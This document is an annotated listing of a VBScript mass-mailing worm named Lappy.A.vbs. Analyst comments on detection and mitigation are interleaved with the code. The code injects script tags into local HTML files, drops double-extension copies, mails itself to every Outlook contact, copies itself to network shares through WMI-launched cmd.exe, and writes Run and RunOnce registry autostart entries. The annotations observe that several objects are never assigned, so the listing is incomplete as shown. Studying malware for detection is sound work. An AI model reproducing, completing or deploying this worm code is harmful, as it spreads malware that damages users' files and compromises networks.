Lappy.A.vbs
' Lappy.A.vbs: script-worm sample. Lines marked NOTE(review) are analyst annotations.
' NOTE(review): objFSO and objOutlook are used below but have no assignment anywhere in
' this listing, and strFilePath is read here before it is assigned further down, so the
' listing as shown is not self-contained.
' NOTE(review): the script references WScript.*, so it is meant to run under Windows
' Script Host; where .vbs execution is not needed, disabling WSH or re-associating
' the .vbs extension removes the execution path.
' If the file at strFilePath exists, open it for reading (mode 1) and close it again unused.
If objFSO.FileExists(strFilePath) Then
Set objFile = objFSO.OpenTextFile(strFilePath, 1)
' Do operations
objFile.Close
End If
' Item type 0 is an Outlook mail item. Only this one item is created in the listing.
Set objMail = objOutlook.CreateItem(0)
' UNC path the script treats as its own location. The rest of the listing reuses it as
' attachment source, injected script URL, copy source and autostart value.
strFilePath = "\\network\share\Lappy.A.vbs"
' Assigned but never referenced again in this listing (no Subject is set on the mail item).
' NOTE(review): the literal is still a usable static string for mail and content filtering.
strEmailSubject = "Check This Out Dude!"
' Check if there are any email addresses in the Outlook contacts
' Everything down to the matching End If runs only when the Outlook session reports
' at least one address list.
If objOutlook.Session.AddressLists.Count > 0 Then
' Infect HTML files on the victim's computer
' objFolder is the directory that holds the running script.
Set objFolder = objFSO.GetFolder(objFSO.GetParentFolderName(WScript.ScriptFullName))
' NOTE(review): objHTMLFiles is not assigned anywhere in this listing.
For Each objHTMLFile In objHTMLFiles
' Only the "html" extension is matched (compared in lower case).
If LCase(objFSO.GetExtensionName(objHTMLFile.Name)) = "html" Then
' Inserts a <script src="..."> tag pointing at strFilePath in front of every literal
' "</head>". Replace is called without a compare argument, so matching is case-sensitive.
strNewHTMLContent = Replace(objHTMLFile.OpenAsTextStream.ReadAll, "</head>", "<script src=""" & strFilePath & """></script></head>")
' Second argument True overwrites the original file in place; no copy is kept.
' NOTE(review): detection - local .html files rewritten by a script-host process and
' gaining a script tag whose src is a UNC or .vbs path.
Set objNewHTMLFile = objFSO.CreateTextFile(objHTMLFile.Path, True)
objNewHTMLFile.Write strNewHTMLContent
objNewHTMLFile.Close
End If
Next
' Infect MP3, PNG, JPG, and MP4 files on the victim's computer
' NOTE(review): no list of those extensions appears in the code; the test below compares
' the file extension with "." plus shell detail column 29 instead. objFileSystem is not
' assigned in this listing; Namespace/Items/GetDetailsOf/CopyHere look like the Windows
' shell automation API - confirm.
Set objFolder = objFileSystem.Namespace(objFSO.GetParentFolderName(WScript.ScriptFullName))
Set objItems = objFolder.Items
For Each objItem In objItems
If LCase(objFSO.GetExtensionName(objItem.Name)) = "." & LCase(objFolder.GetDetailsOf(objItem, 29)) Then
' Passes strFilePath with the item's extension appended to CopyHere on the script's folder.
' NOTE(review): detection - files named "Lappy.A.vbs.<ext>" (double extension).
objFolder.CopyHere strFilePath & "." & objFSO.GetExtensionName(objItem.Name)
End If
Next
' Send the worm to email contacts
Set objNS = objOutlook.GetNamespace("MAPI")
' The profile name and password are literal placeholder-looking strings.
objNS.Logon "profilename", "password", False, True
' Default folder 10 is the Outlook Contacts folder.
Set objContacts = objNS.GetDefaultFolder(10).Items
For Each objContact In objContacts
' Only items whose Class equals the literal 43 are processed.
If objContact.Class = 43 Then
' The same objMail object is reused on every pass; no new item is created in this loop.
objMail.To = objContact.Email1Address
objMail.Body = "Check this Out Dude!"
' Attaches strFilePath by value (type 1) under the display name "Lappy.A.vbs".
' NOTE(review): detection/mitigation - a script host automating Outlook to send mail,
' the fixed body text and the .vbs attachment name are all filterable; blocking
' script attachments at the gateway and keeping Outlook's programmatic-access
' prompt enabled both interrupt this step.
objMail.Attachments.Add strFilePath, 1, 0, "Lappy.A.vbs"
objMail.Send
End If
Next
End If
' Spread the worm on the network
' Reads the local computer name and connects to the local root/cimv2 WMI namespace.
Set objNetwork = CreateObject("WScript.Network")
strComputerName = objNetwork.ComputerName
Set objWMI = GetObject("winmgmts://" & strComputerName & "/root/cimv2")
' Win32_Share Type=0 selects disk-drive shares defined on the local machine.
Set colItems = objWMI.ExecQuery("SELECT * FROM Win32_Share WHERE Type=0")
For Each objItem In colItems
' The share's Name is placed in the host position of the UNC path, followed by the
' script's full local path.
strRemoteSharePath = "\\" & objItem.Name & "\" & WScript.ScriptFullName
' The same share Name is used as the host part of a second WMI connection.
Set objWMI2 = GetObject("winmgmts://" & objItem.Name & "/root/cimv2")
' Asks that WMI connection to start "cmd.exe /c copy" from strFilePath to the path above.
' NOTE(review): detection - Win32_Process.Create invoked from a script host, and the WMI
' provider host spawning "cmd.exe /c copy" of a .vbs file. Mitigation - limit who may
' use remote WMI and who holds administrative rights on peers.
objWMI2.Get("Win32_Process").Create("cmd.exe /c copy """ & strFilePath & """ " & strRemoteSharePath)
Next
' Create a registry key to autostart the worm
' Writes a REG_SZ value named "Lappy.A.vbs" under the current user's Run key; the data is
' strFilePath wrapped in double quotes (chr(34)).
strRegistryPath = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
strRegistryKey = "Lappy.A.vbs"
strRegistryValue = chr(34) & strFilePath & chr(34)
Set objRegistry = CreateObject("WScript.Shell")
' NOTE(review): detection - a script host writing to HKCU ...\CurrentVersion\Run, and the
' value names "Lappy.A.vbs" / "Lappy.A.vbs_backup", are static indicators for
' registry-write telemetry and autostart audits.
objRegistry.RegWrite strRegistryPath & "\" & strRegistryKey, strRegistryValue, "REG_SZ"
' Create a backup registry key for the worm's backup file
' Second value, under RunOnce. If "backup_Lappy.A.vbs" is absent from the script's own
' folder the value points at that path; otherwise it points at strFilePath.
' NOTE(review): nothing in this listing creates backup_Lappy.A.vbs.
strBackupRegistryPath = "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
strBackupRegistryKey = "Lappy.A.vbs_backup"
If Not objFSO.FileExists(objFSO.BuildPath(objFSO.GetParentFolderName(WScript.ScriptFullName), "backup_Lappy.A.vbs")) Then
strBackupRegistryValue = chr(34) & objFSO.BuildPath(objFSO.GetParentFolderName(WScript.ScriptFullName), "backup_Lappy.A.vbs") & chr(34)
Else
strBackupRegistryValue = chr(34) & strFilePath & chr(34)
End If
objRegistry.RegWrite strBackupRegistryPath & "\" & strBackupRegistryKey, strBackupRegistryValue, "REG_SZ"
' Shows a modal message box to the logged-on user; the literal is another static string.
MsgBox "Hacked By Chinese!"